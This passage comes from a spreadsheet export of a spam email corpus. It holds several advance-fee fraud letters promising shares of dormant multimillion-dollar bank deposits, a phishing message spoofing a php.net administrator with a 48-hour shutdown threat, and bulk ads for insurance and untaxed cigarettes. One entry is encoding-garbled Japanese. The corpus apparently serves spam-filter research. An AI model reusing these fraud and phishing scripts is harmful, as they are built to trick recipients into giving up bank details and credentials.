DECEASED FOR SAFETY AND SUBSEQUENT \nDISBURSEMENT SINCE NOBODY IS COMING FOR IT AND WE DONT WANT THIS MONEY TO GO \nINTO THE BANK TREASURY AS UNCLAIMED BILL.\n\nTHE BANKING LAW AND GUIDELINE HERE STIPULATES THAT IF SUCH MONEY\nREMAINED UNCLAMED AFTER FIVE YEARS, THE MONEY WILL BE TRANSFERED INTO THE \nBANK TREASURY AS UNCLAIMED FUND. THE REQUEST OF FOREIGNER AS NEXT OF KIN IN \nTHIS BUSINESS IS OCCASIONED BY THE FACT THAT THE CUSTOMER WAS A FOREIGNER, \nAND A GHANAIAN CANNOT STAND AS NEXT OF KIN TO A FOREIGNER. WE AGREE THAT 40 \n% OF THIS MONEY WILL BE FOR YOU AS FOREIGN PARTNER, IN RESPECT TO THE \nPROVISION OF A FOREIGN ACCOUNT, 10 % WILL BE SET ASIDE FOR EXPENSES INCURED \nDURING THE BUSINESS AND 50 % WOULD BE FOR  THERE AFTER I  WILL VISIT YOUR \nCOUNTRY FOR DISBURSEMENT ACCORDING TO THE PERCENTAGES INDICATED.THEREFORE TO \nENABLE THE IMMEDIATE TRNANSFER OF THIS FUND TO YOU ASARRANGED, YOU MUST \nAPPLY FIRST TO THE BANK AS RELATIONS OR NEXT OF KIN OF THE DECEASED \nINDICATING YOUR BANK NAME, YOUR BANK ACCOUNT NUMBER, YOUR PRIVATE TELEPHONE \nAND FAX NUMBER FOR EASY AND EFFECTIVE COMMUNICATION AND LOCATION WHERE THE \nMONEY WILL BE REMITTED.UPON RECEIPT OF YOUR REPLY, I WILL SEND TO YOU BY FAX \nOR EMAIL THE TEXT OF THE APPLICATION I WILL NOT FAIL TO BRING TO YOUR NOTICE \nTHAT THIS TRANSACTION IS HITCH FREE AND THAT YOU SHOULD NOT ENTERTAIN ANY \nATOM OF FEAR AS ALL REQUIRED ARRANGEMENTS HAVE BEEN MADE FOR THE TRANSFER.\n\nYOU SHOULD CONTACT ME.IMMEDIATELY AS SOON AS YOU RECEIVE THIS LETTER. \nTRUSTING TO HEAR FROM\nYOUIMMEDIATELY.\n\nYOURS FAITHFULLY,\nDAN ASANTE\nALTERNATIVE EMAIL:danasante777@yahoo.com\n\nPOST SCRITUM:YOU HAVE TO KEEP EVERYTHING SECRET AS TOENABLE THE TRANSFER TO \nMOVE VERY SMOOTHLY IN TO THE ACCOUNT YOU WILLPROVE TO THE BANK.AS YOU \nFINISHED READING THIS LETTER GET BACK TO ME\nIMMEDIATELY SO THAT WE DISCUSS VERY WELL OVER THIS BUSINESS.\n.......................................................................................\n\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today it's FREE! \n[URL]http://messenger.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2330</t>
  </si>
  <si>
    <t>To: R@M\nFrom: Ms Nasrinn N.Farooq &lt;sedattz01@yahoo.es&gt;\nDate: Tue, 11 Jul 2006 13:45:28 +0400</t>
  </si>
  <si>
    <t>Tue, 11 Jul 2006 13:45:28 +0400</t>
  </si>
  <si>
    <t>Ms Nasrinn N.Farooq &lt;sedattz01@yahoo.es&gt;</t>
  </si>
  <si>
    <t>FROM: Ms Nasrinn N.Farooq</t>
  </si>
  <si>
    <t xml:space="preserve">My Dear Friend,\nI got your contact through a desperate and personal search on the web for someone I could really trust as I have prayed over it and I wish to express my interest to handle this matter with you as Ibelieve that you are reliable in handling these type of international transaction.\n\nThough we have not met before but I believe one has to risk confiding in someone to succeed sometimes in life but however is not mandatory or in any manner compel you to Honor against your will.\n\nAlthough I am not suppose to contact you through email but it is because of the confidential nature of this transaction please bear with me\n\nI am Ms Nasrinn N.Farooq, a top bank official in the National Bank of Dubai,(UNITED ARAB EMIRATES).\n\nI am writing this letter to ask for your support and co-operation to carry out this business opportunity in my department.\n\nOn June 6, 1999,an Oil consultant/contractor with Dubai Petroleum Corporation, MR DAVID AMEERALY, made a numbered time(fixed)deposit for twelve calendar months,Valued at US$16,500, 000.00 (sixteen Million Five Hundred Thousand Dollars) in my branch. upon maturity I sent a routine notification to his forwarding address but got no reply.\n\nAfter a month,we sent a reminder and finally we discovered from his contract employers,the Dubai Petroleum Corporation that MR DAVID AMEERALY, died in the plane crash On October 31,1999,(an Egyptian Boeing767Flight 990) with other passengers on board as you can confirm it yourself via the website below:\n[URL]http://www.cbsnews.com[/URL]\n\nOn further investigation,I found out that he died without making a WILL and attempts to trace his next of kin were fruitless .I therefore made further investigation and discovered that MR DAVID AMEERALY,did not declare any next of kin or relations in all his official documents,including his bank deposit paperwork in my bank.\n\nThis sum of US$16,500, 000.00 and the interest is being rolled over with the principal sum at the end of each year.No one will ever come forward to claim it and according to UNITED ARAB EMIRATES LAW,at the expiration of(Ten) years,the money will revert to the ownership of the UNITED ARAB EMIRATES Government if nobody applies to claim the fund.\n\nMy proposal is that I will like you to stand as the next of kin to MR DAVID AMEERALY, so that the fruit of this old man labour will not get into the hands of some corrupt Government officials.This is simple, I will like you to provide immediately your full name and address so that I can forward to you the contact of our bank Attorney for preparing the necessary documents and affidavits which will put you in place as the next of kin.\n\nAny bank account in any part of the world,which you will provide,will then facilitate the transfer of this money to you as the beneficiary/next of kin.\n\nThe money will be paid into your account for us to share in ratio of  45% for me and 45% for you and 10 % will be set aside for expenses in cured during the business.There is no risk at all.\n\nThe paperwork for this transaction will be done by the attorney and my position as the Branch Manager guarantees the successful execution of  this transaction.\n\nIf you are interested,please reply immediately and upon your responses,I shall provide you with more details and relevant documents that will help you understand the transaction.\n\nPlease observe utmost confidentiality and be rest assured that this transaction would be most profitable for both of us because I shall require your assistance to invest my share in your country.\n\nPlease upon the receipt of this mail message,send to me the following below to enable me start the processing of the transfer,\n\n1.Your Full Name\n2.Your House Address.\n3.Your Phone Number and Fax,\n\nThank You And God Bless You.\n\nSincerely,\n\nMs Nasrinn N.Farooq  </t>
  </si>
  <si>
    <t>2324</t>
  </si>
  <si>
    <t>To: nan\nFrom: Robson Bight &lt;robsonbight3@virgilio.it&gt;\nDate: Tue, 11 Jul 2006 00:03:43 +0100</t>
  </si>
  <si>
    <t>Tue, 11 Jul 2006 00:03:43 +0100</t>
  </si>
  <si>
    <t>Robson Bight &lt;robsonbight3@virgilio.it&gt;</t>
  </si>
  <si>
    <t>Hello friend</t>
  </si>
  <si>
    <t>Hello friend, \n\nPlease bear with me for now. What I have may be of \ninterest to you. It is a business proposal that will be beneficial to \nyou and me. \nI live in London, United Kingdom. I am 51 years old and I \nhave been working in a bank in London for the past 17 years where I am \npresently an accounts manager.\n\nI will give you my full details on your \nreply to this letter. My aim of contacting you is to solicit your co-\noperation and assistance based on one of the accounts under my \nmanagement containing $27.700, 000 million (Twenty seven million  seven \nhundred thousand dollars) which have remained dormant for the last \nEleven months. \n\nThis account was owned by the late Mr. Teslim Ramzi \nMohammed a Lebanese from Johaya town, following my investigation, I \nfound out that he died on July 7th 2005 via a bomb blast that happened \nin the London and he left no children or next of kin \n\nHere are the \nfollowing websites for verification purpose\nhttp://www.mapsofworld.\ncom/mapinnews/london-blast.html\n[URL]http://news.bbc.co.uk[/URL]\nstm\n \nI will inform you more on how we can get the money in his account \ntransferred into your account if you agree to co-operate with me on \nthis on your reply to this mail. I will also give you more personal \ndetails of me and the transaction on your reply. Please treat this as \nconfidential, urgent and of utmost importance.\nNote:-Your country, \ntelephone, mobile and fax number is important for urgent, easy and fast \ncommunication.\n\nSincerely\nRobson Bight\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>1159</t>
  </si>
  <si>
    <t>To: undisclosed-recipients:;\nFrom: IT Administrator &lt;admin@php.net&gt;\nDate: Tue, 11 Feb 2020 13:52:33 +1300</t>
  </si>
  <si>
    <t>Tue, 11 Feb 2020 13:52:33 +1300</t>
  </si>
  <si>
    <t>IT Administrator &lt;admin@php.net&gt;</t>
  </si>
  <si>
    <t>Mail User Security Alert</t>
  </si>
  <si>
    <t>Dear User,  Due to recent security issues, all account user are mandated to link their mobile to their email. This measure is meant to add extra security feature to your account  REGISTER YOUR MOBILE NOW! [1]  ***CAUTION: If you ignore this notice and fail to secure your account within 48hours, your email will be moved to our blacklist database and shutdown without further notice!  Source: IT Administrator under Email Security  Links: ------ [1] [URL]https://nicolasvaccari.me[/URL] Dear User, Due to recent security issues, all account user are mandated to link their mobile to their email.This measure is meant to add extra security feature to your account Register Your Mobile Now! ***Caution:If you ignore this notice and fail to secure your account within 48hours,your email will be moved to our blacklist database and shutdown without further notice! Source: IT Administrator under Email Security</t>
  </si>
  <si>
    <t>https://nicolasvaccari.me</t>
  </si>
  <si>
    <t>1986</t>
  </si>
  <si>
    <t>To: R@M\nFrom: Mr.David Sarr &lt;d_s@mail.com&gt;\nDate: Tue, 11 Apr 2006 21:06:20 +0100</t>
  </si>
  <si>
    <t>Tue, 11 Apr 2006 21:06:20 +0100</t>
  </si>
  <si>
    <t>Mr.David Sarr &lt;d_s@mail.com&gt;</t>
  </si>
  <si>
    <t>\n\nMr.David Sarr\nMANAGER:ECOBANK.\nDAKAR-SENEGAL.Branch.\nEmail:da_sarr@katamail.com\nTel:  +221-4488469\n\n Dear friend,\n\n I know this email will reach you as a surprise, but need not to worry as i am using the only secured and confidential medium available to seek for foreign assistance in a business.\n I would respectfully request that you keep the contents of this mail confidential and respect the integrity of the information you come by as a result of this mail.\n I am contacting you concerning a customer and deposit placed under our banks management 10 years ago,i am contacting you independently of our investigation and no one is informed of this communication.\n I am Mr.David Saar from Ecobank,Dakar-Senegal.Branch.This business request may seem strange, but I crave your indulgence and pray you view it seriously as I am convinced that you would be capable to provide me with a solution to a money transfer.\n On 6th,june,1997, a Nigerian came to make a (fixed) deposit valued at US$10,500,000.00(Ten Million Five Hundred Thousand Dollars )in  my branch to be claimed by a foreing beneficiary to be later named,upon maturity,we sent a routine notification to his forwarding address but got no reply.\n After three years of sending reminder with no responce,we decided to open an investigation,and i was the head of the panel set up for the investigation,in the course of our investigation i finally discovered the money was Part of the loot the late Nigerian Ruler General Sani Abacha stole from Nigeria,the money was deposited under a false name. you can  confirm it yourself via the website below. \n[URL]http://www.usatoday.com[/URL]\n On further investigation, I found out that no one knows of the deposit not even his family members he died without telling any one of it.Therefore he did not declare any next of kin or relations in all his documents, including his bank deposit paperwork in my bank as the deposit was a secret one,so i decided to keep the secret to my self as i view this as a once in a lifetime oportunity for me.\n My bank has waited for the beneficiary to come and make claims but no one has ever come forward,the reason is that he was yet to name the beneficiary before he died and i am the only one aware of this fact because i am the one in charge of the transaction. \n This sum of US$10,500,000.00 and the interest is being rolled over with the  principal sum at the end of each year. No one will ever come forward to claim it According to my Country's law, at the expiration of 10(TEN)years,the money will revert to the ownership of the SENEGALESE Government if nobody  applies to claim the fund.\n Consequently, my proposal is that I will like you as a foreigner to  stand as the beneficiary to the deposit so that the money will not get into the hands of some corrupt Government officials. I assure you that I could have the deposit released to you in a few days. \n I will simply inform our bank of the final closing of the file relating to the deposit.This is simple,upon your approval,I will like you to \nprovide immediately your full name and address so that the Attorney will prepare the necessary documents and affidavits which will put you in place as the beneficiary.\n We shall employ the service of two attorneys for the drafting and notarization of the WILL and obtain the necessary documents and letter  of probate administration in your favour for the transfer.\n Any bank account in any part of the world which you will provide will  then facilitate the transfer of this money to you as the beneficiary.\n The money will be paid into your account for us to share in ratio of 35% for me,35% for you,20% for any charity organization of our choice and 10 % will be set aside for expenses  incured during the business . \n There is no risk at all;i have waited eigth(8)years now to be very sure of this plan,the paperwork for this transaction will be done by the attorney and my position as the Branch Manager guarantees the successful execution of this transaction. If you are interested, please reply immediately via the private email address below, upon your response, I shall provide you with more details and relevant documents that will help you understand the transaction.\n Please observe outmost confidentiality and be rest assured that this  transaction would be most profitable for both of us because I shall require your assistance to invest my share in your country.\n Please upon your approval of this mail message, send to me the following  to enable me start the processing of the fund transfer into your bank account:\n1.) The beneficiary's name and complete info.2.) Your private / official telephone and fax number.\n I am aware of the consequences of this proposal. I ask that if you find no interest in this project that you should discard this mail. I ask that you do not be vindictive or destructive. If my offer is of no appeal to you, delete this message and forget I ever contacted you. Do not destroy my career because you do not approve of my proposal. You may not know this but people like me who have made tidy sums out of comparable situations run the whole banking sector.\n I do not find this move against good conscience, this may be hard for you to understand, but the dynamics of my industry dictates that I make this move. Such opportunities only come ones way once in a lifetime. I cannot afford to let this chance pass me by, for once I find myself in total control of my destiny. This is my chance and I won't let it pass me by.If you will not work with me let me know \nand let me move on with my life but please do not destroy me.I am a family man and this is an opportunity to provide my family with new opportunities. \n There is a reward for this project and it is a task well worth undertaking.I have evaluated the risks and the only risk I have here is from you refusing to work with me and alerting my bank.\n Awaiting your Urgent Reply via my private email:da_sarr@katamail.com or call me on \nmy private telephone number: +221-4488469 for further discussion.\nThanks and God bless,\nMr.David Sarr\n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>1983</t>
  </si>
  <si>
    <t>To: nan\nFrom: muye will &lt;willmuye21@hotmail.com&gt;\nDate: Tue, 11 Apr 2006 08:18:09 +0000</t>
  </si>
  <si>
    <t>Tue, 11 Apr 2006 08:18:09 +0000</t>
  </si>
  <si>
    <t>muye will &lt;willmuye21@hotmail.com&gt;</t>
  </si>
  <si>
    <t>urgent plea for assistance</t>
  </si>
  <si>
    <t>FROM THE DESK OF CHAIRMAN\nSub-Committee on Finance\nSouth African World Cup bid 2010\n24 Steven Bikko Blvrd Pretoria,\nRepublic Of South Africa.\nEmail:willico1@gmail.com  .\nTel : +27-73-485-8223 .\nAttn: Sir,\n\nGreetings you must be aware now that my country The Republic of South Africa \nwon\nthe bid to host the world cup by 2010, prior to this bid my committee was\nmandated to lobby the members of board of Federation International Football\nAssociation (FIFA) on selection of the country to host the world, the \nbidding\nwas intensive but at the end we got the hosting right. My committee was \ngiven\nthe sum of $29 million dollars to lobby the members of the FIFA ruling body \nto\nmake sure that we win the hosting right considering the gain that comes with \nthe\nhosting right like South Africa's economy will receive a massive direct \nboost\nfrom hosting the 2010 World Cup, financial impact report for South Africa's\nWorld Cup bid committee shows that the 2010 World Cup will pump \nR21.3-billion\ninto South Africa's economy, and creating an estimated 159 000 new jobs.\nWith the help the living legend of our time 85-year-old Nobel  Peace Prize\nwinner Dr. Nelson Mandela who made an emotive case for The  Republic of \nSouth\nAfrica, we got the bid without spending all the money, I and my committee\nmembers saw this as a God sent opportunity tosecure our future and that of \nour\nfamily therefore was mandated by  other committee members to look for a way \nto\nmove the remaining money  to a safe place with the  help of a foreigner who \nwe\ncan trust and is  ready to assist us to move the funds considering the fact \nthat\nwe are  still members of the bid committee and in the eyes of the public. we\nhave in our possession the sum $21millon since we spent just $8million  for\nlobbying. We are ready to give you 20% for all your assistance then me and \nmy\ncolleagues will keep 80% lf you are willing kindly reply  to my letter for\nfurther directive. we will want to invest our share  intoReal-estate and air\ntaxi business in your country with your  assistance,bearing in mind that\nconfidentiality is of great essences  so is time in this project I will \nawait\nyour response, Best Regards .\n\n\nMr.Williams Muyeke\nAll responses should be sent\nto:willico1@gmail.com  .\n\n_________________________________________________________________\nSee their smiles, hear their laughter with MSN Messenger! \n[URL]http://messenger.msn.co.za[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://messenger.msn.co.za</t>
  </si>
  <si>
    <t>4343</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "IQ - NBC" &lt;nbc@insiq.us&gt;\nDate: Tue, 10 Sep 2002 18:52:25 -0400</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 18:52:25 -0400</t>
  </si>
  <si>
    <t>"IQ - NBC" &lt;nbc@insiq.us&gt;</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_C2C45_01C258E6.DAEEA330 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  PruLife Universal Protector  - and -  Prulife Universal Plus   ROCK!    Case Closed! Permanent Life Insurance at Affordable Rates Whether your clients are looking to pay the Minimum Premiums needed to Endow* a policy at a specific age or pay sufficient premiums needed to guarantee** a death benefit for life, Prudential has the answer. PruLife Universal ProtectorSM offers competitive lifetime death benefit guarantee premiums. PruLife Universal PlusSM offers competitive minimum premiums to endow and competitive long term cash value accumulation. And that's not all. Look what else Prudential+ has to offer...   _____   COMPETITIVE COMPENSATION	   	 Rolling Commissionable Target Premiums (R-CTP)++. First year compensation will be paid until the R-CTP is reached during the first 24 policy months. 	  	 First year commissions that do not reduce at any issue age. 	  COMPETITIVE UNDERWRITING	   	 Issue ages 0-90	   	 Continuation of coverage beyond age 100 (policy has no maturity age).	   	 Preferred Non-Smoker category for cigar smokers, pipe smokers and smokeless tobacco users (nicotine patch and gum users also may be eligible if they have not smoked cigarettes in the last 12 months) 	  	 Preferred Plus Smoker category for healthy Cigarette Smokers.  	 Aviation: Preferred rates may be offered to commercial pilots and most student and private pilots who fly up to 200 hours per year, regardless of whether helicopters or fixed wing aircraft are flown. 	  	 Treadmills not required for preferred rates for face amounts within our capacity limits	   	 Improved Ratings for Prostate Cancer, Hepatitis B &amp; C	   	 Heart attack? Consider Prudential as soon as the prospect returns to normal activities	   	 Liberal Build Tables to qualify for Preferred rates	  INCREASED CAPACITY	   	 $70 million capacity without the need to discuss a risk with reinsurers.	   	 Facultative reinsurance may be available for cases in excess of $70 million.	    _____   Click our logo for the BGA nearest you! Click here for the NBC BGA Locator!   ? or ? Please fill out the form below for more information	  Name:	  	 	 E-mail:	  	 Phone:	  	 City:	  	State:	  	  	  	 	   	    National Brokerage Consortium * Minimum Premium to Endow is a hypothetical, non-guaranteed premium that, based on current charges and the current interest rate, would keep the policy in force to age 100. Interest rates and charges will change over time, as will the Minimum Premium to Endow. These premiums are shown as hypothetical figures based on the stated assumptions and are shown for comparative purposes only. The actual premium needed to keep the policy in force is based on actual results and may be higher or lower. ** All guarantees are based on the claims-paying ability of the issuer.  + PruLife Universal Protector is issued by Pruco Life Insurance Company. PruLife Universal Plus also is issued by Pruco Life Insurance Company in all states except New Jersey and New York, where it is issued by Pruco Life Insurance Company of New Jersey, both Prudential Financial, Inc. companies located at 213 Washington Street, Newark, NJ 07102-2992. Each is solely responsible for its own financial condition and contractual obligations.  ++ Available on contracts dated Jan. 1, 2002 &amp; later. Not available in New York &amp; New Jersey. Prudential Financial is a service mark of The Prudential Insurance Company of America, Newark, NJ and its affiliates. For financial professional use only. Not for use with the public.  IFS-A072238 Ed. 7/2002 Exp. 12/2003	  We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.InsuranceIQ.com[/URL]   Legal Notice    ------=_NextPart_000_C2C45_01C258E6.DAEEA330 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Pru Life's UL Portfolio Rocks =20 =20              =20        =20           =20              Case = Closed!               Permanent Life Insurance at Affordable = Rates Whether your clients are looking to pay the Minimum=20               Premiums needed to Endow* a policy at a specific age or = pay sufficient=20               premiums needed to guarantee** a death benefit for               life, Prudential has the answer. PruLife Universal ProtectorSM offers=20               competitive lifetime death benefit guarantee premiums. = PruLife Universal=20               PlusSM offers competitive minimum premiums to = endow and=20               competitive long term cash value accumulation. And that's not all. = Look what=20               else Prudential+ has to offer... =20           =20              =20                 COMPETITIVE COMPENSATION =20                   Rolling Commissionable Target = Premiums (R-CTP)++.                   First year compensation will be paid until the R-CTP = is reached=20                   during the first 24 policy months. =20                    First year commissions=20                   that do not reduce at any issue age. =20                  COMPETITIVE UNDERWRITING =20                   Issue ages = 0-90 =20                   Continuation of = coverage=20                   beyond age 100 (policy has no maturity = age). =20                   Preferred Non-Smoker category                   for cigar smokers, pipe smokers and smokeless tobacco = users=20                   (nicotine patch and gum users also may be eligible if = they have=20                   not smoked cigarettes in the last 12 months)  =20                   Preferred Plus = Smoker category=20                   for healthy Cigarette Smokers. =20                   Aviation: Preferred rates=20                   may be offered to commercial pilots and most student = and private=20                   pilots who fly up to 200 hours per year, regardless of = whether=20                   helicopters or fixed wing aircraft are flown. =20                   Treadmills not = required=20                   for preferred rates for face amounts within our = capacity limits =20                   Improved = Ratings for Prostate=20                   Cancer, Hepatitis B &amp; C =20                    Heart attack? = Consider=20                   Prudential as soon as the prospect returns to normal = activities =20                   Liberal Build = Tables to=20                   qualify for Preferred rates =20                 INCREASED = CAPACITY =20                   $70 million = capacity without=20                   the need to discuss a risk with = reinsurers. =20                   Facultative = reinsurance=20                   may be available for cases in excess of $70 = million. =20            Click our logo for the BGA nearest = you!             — or — =20                  =20                      =20                         Please fill = out the form below for more information =20                         Name: =20                            =20                         E-mail: =20                            =20                         Phone: =20                            =20                         City: =20                            State: =20                            =20                           =20                              =20                            =20            =20           * Minimum Premium to Endow is a = hypothetical, non-guaranteed=20             premium that, based on current charges and the current = interest rate,=20             would keep the policy in force to age 100. Interest rates = and charges=20             will change over time, as will the Minimum Premium to Endow. = These=20             premiums are shown as hypothetical figures based on the = stated assumptions=20             and are shown for comparative purposes only. The actual = premium needed=20             to keep the policy in force is based on actual results and = may be=20             higher or lower. ** All guarantees are based on the = claims-paying=20             ability of the issuer.              + PruLife Universal Protector is issued by Pruco Life = Insurance Company.=20             PruLife Universal Plus also is issued by Pruco Life = Insurance Company=20             in all states except New Jersey and New York, where it is = issued by=20             Pruco Life Insurance Company of New Jersey, both Prudential = Financial,=20             Inc. companies located at 213 Washington Street, Newark, NJ = 07102-2992.=20             Each is solely responsible for its own financial condition = and contractual=20             obligations.              ++ Available on contracts dated Jan. 1, 2002 &amp; later. = Not available=20             in New York &amp; New Jersey.             Prudential Financial is a service mark of The Prudential = Insurance=20             Company of America, Newark, NJ and its affiliates. For = financial professional=20             use only. Not for use with the public.              IFS-A072238 Ed. 7/2002 Exp. 12/2003 =20     =20        We = don't want anyone=20         to receive our mailings who does not wish to. This is = professional communication=20         sent to insurance professionals. To be removed from this mailing = list,=20         DO NOT REPLY to this message. Instead, go here: =20         [URL]http://www.InsuranceIQ.com[/URL] Legal Notice=20 ------=_NextPart_000_C2C45_01C258E6.DAEEA330--</t>
  </si>
  <si>
    <t>4340</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Eseimoku K.Anderson(Chief)" &lt;k_u2_1999@consultant.com&gt;\nDate: Tue, 10 Sep 2002 16:17:30 +0200</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 16:17:30 +0200</t>
  </si>
  <si>
    <t>"Eseimoku K.Anderson(Chief)" &lt;k_u2_1999@consultant.com&gt;</t>
  </si>
  <si>
    <t>[ILUG] Seeking Your Partnership</t>
  </si>
  <si>
    <t>Dear Partner to be,\n\nFirst, I must apologise to you for using this medium to communicate to you\nabout this project.\n\nI am a highly placed official of  Government of Nigeria and also a\nfounding member of the ruling party in Power now,the Peoples Democratic\nParty(PDP).\n\nMy committee - The Niger Delta Development Corporation(NDDC)-which is in\ncharge of managing and supervising  the disbursement of oil sales revenues\nfor the Nigerian government.The revenues  under our control runs into\nseveral hundred of millions of dollars monthly.My self and   \nother colleagues in the NDDC are currently in need of a foreign partner\nwith whose bank account we shall transfer the sum of Forty Nine Million\nFive Hundred Thosand United States Dollars($49.5m).This fund accrued to us\nas commission for oil sales contracts handled under our supervision.\n\nThe fund is presently waiting in the Government Account named CBN/FGN\nINDEPENDENT REVENUE account number 400-939134 with J.P.MORGAN CHASE\nBANK,New York.You can do your independent verification of this. However,\nby virtue of our  position as civil servants and members of the NDDC, we\ncannot acquire this funds in our name. This is because as top civil\nservants, we are not allowed by law of the land to own or operate bank\naccounts outside our country for now.\n\nI have been delegated as a matter of trust by my colleagues,\nto look for an overseas partner in whose account we would\ntransfer the fund\n\nHence the reason for this mail.We shall be Transferring the money to your\naccount with your company as we shall present your company as a registered\nForeign company in Nigeria and you are been paid for a contract which you\nexecuted for our country through the NDDC and any other Federal Ministry\nthat we decide to use to siphon the funds through.\n\nFor your support and partnership,please reply me to negotiate your fees or\nthe percentage you wish to be paid when the funds arrive your bank account.\n\nYou must however note that this transaction, with\nregards to our disposition to continue with you, is subject\nto these terms. Firstly, our conviction of your transparency.\nSecondly, that you treat this transaction with utmost secrecy\nand confidentiality. Finally and above all, that you will provide\nan account that you have absolute control over.\n\nThe transaction, although discrete, is legitimate and there\nis no risk or legal disadvantages either to ourselves or yourself now or\nin the future as we have put in place perfect mchineries that will ensure\na hitch free transfer into your account upon acceptance.\n\nThe transfer will be effected to your account within ten-fourteen\n(10-14) working days as soon as we reach an agreement and you furnish\nme with a  suitable bank account and company name and address with all\nyour contact numbers including fax number.\n\nI am looking forward to doing business with you and do solicit\nyour confidentiality in this transaction,  Please mail your\nresponse to me.\n\nYours faithfully,\nAnderson K. Eseimoku\n \n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>4392</t>
  </si>
  <si>
    <t>To: =?iso-2022-jp?B?MTIx?=@p6044-ipad22marunouchi.tokyo.ocn.ne.jp\nFrom: =?iso-2022-jp?B?cml0ZTFAcmVzZXQuanA=?=@p6044-ipad22marunouchi.tokyo.ocn.ne.jp\nDate: Tue, 10 Sep 2002 14:20:15 +0900</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 14:20:15 +0900</t>
  </si>
  <si>
    <t>=?iso-2022-jp?B?cml0ZTFAcmVzZXQuanA=?=@p6044-ipad22marunouchi.tokyo.ocn.ne.jp</t>
  </si>
  <si>
    <t>=?iso-2022-jp?B?MTIx?=@p6044-ipad22marunouchi.tokyo.ocn.ne.jp</t>
  </si>
  <si>
    <t>=?iso-2022-jp?B?GyRCJDckOCRfJEgkYiRiJE4lMyVpJVwlbCE8JTclZyVzGyhK?=</t>
  </si>
  <si>
    <t>B_x0003__x0002__x0001__x0002__x0005_Â_x0001_\nB_x0007__x0001__x0003__x0003_R{[V\n[^rfIicucj\n_x0002__x0007_I_x0001_c_x0001_B_x0001_©©Ð_x0002__x0007_\nB_x0003_Â_x0007_A_x0002_I\n[URL]http://book-i.net[/URL]\ni\n`@Écn9@_x0013__x0003_\n_x0002__x0002_Â_x0001__x0002__x0002_132iBD]I\n(^-^)/~Fg[\n\n\nTo Unsubscribe: send mail to majordomo@FreeBSD.org\nwith "unsubscribe freebsd-questions" in the body of the message</t>
  </si>
  <si>
    <t>http://book-i.net</t>
  </si>
  <si>
    <t>4342</t>
  </si>
  <si>
    <t>To: &lt;webmaster@eborder.nec.com&gt;\nFrom: "Discount Smokes" &lt;cheapsmokes@terra.es&gt;\nDate: Tue, 10 Sep 2002 13:53:44 -1900</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 13:53:44 -1900</t>
  </si>
  <si>
    <t>"Discount Smokes" &lt;cheapsmokes@terra.es&gt;</t>
  </si>
  <si>
    <t>&lt;webmaster@eborder.nec.com&gt;</t>
  </si>
  <si>
    <t>CIGARETTES WHOLESALE!       HYWWZZLZD</t>
  </si>
  <si>
    <t>$19.95 and up!  Buy cartons of cigarettes wholesale, starting at $19.95.   FREE SHIPPING! Why pay state taxes?  100% legal. Mailed from Swiss bonded warehouse. For  personal use only, must be 18 years of age and older, verified by credit  card.  [URL]http://4tools4life.com[/URL] AOL Users Click Here To be removed from future mailings, REPLY to this email with REMOVE in the SUBJECT line.</t>
  </si>
  <si>
    <t>http://4tools4life.com</t>
  </si>
  <si>
    <t>4338</t>
  </si>
  <si>
    <t>To: &lt;webmake-talk@example.sourceforge.net&gt;\nFrom: "BILSAG" &lt;bilsag@yahoo.com&gt;\nDate: Tue, 10 Sep 2002 13:41:57 +0300</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 13:41:57 +0300</t>
  </si>
  <si>
    <t>"BILSAG" &lt;bilsag@yahoo.com&gt;</t>
  </si>
  <si>
    <t>&lt;webmake-talk@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>[WM] CEVIRI YAZILIMLARI</t>
  </si>
  <si>
    <t>HTML&gt;                   NTERNETTE KENDNZ DAHA Y HSSEDECEKSNZ. 	  NGLZCE WEB SAYFALARININ TRKE'YE EVR YAZILIMI 	     $ 39+KDV   NGLZCE'DEN TRKE'YE BLGSAYAR DESTEKL 	    METN EVR YAZILIMI   	  	 (MS-WORD ALTINDA KULLANIM, TM WINDOWS VERSYONLARI LE UYUMLU) 	    $ 69+KDV  K YAZILIM   BRLKTE  $    89+KDV Ayrntl Bilgi        in    tklayn                                    BLSAG Ltd. AHMET MTHAT        EFEND SOK. 22/1 ANKAYA 06700 / ANKARA / Tlf: 0312. 439 2850/ Fax: 0312. 439 9347 bilsag@msn.com     E-posta adres listemizden kmak iinIKAR tuuna basnz Bu elektronik posta: webmake-talk@example.sourceforge.net e gnderilmitir ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ webmake-talk mailing list webmake-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>4391</t>
  </si>
  <si>
    <t>To: =?iso-2022-jp?B?MTIx?=@p6044-ipad22marunouchi.tokyo.ocn.ne.jp\nFrom: =?iso-2022-jp?B?cml0ZTFAcmVzZXQuanA=?=@p6044-ipad22marunouchi.tokyo.ocn.ne.jp\nDate: Tue, 10 Sep 2002 13:38:32 +0900</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 13:38:32 +0900</t>
  </si>
  <si>
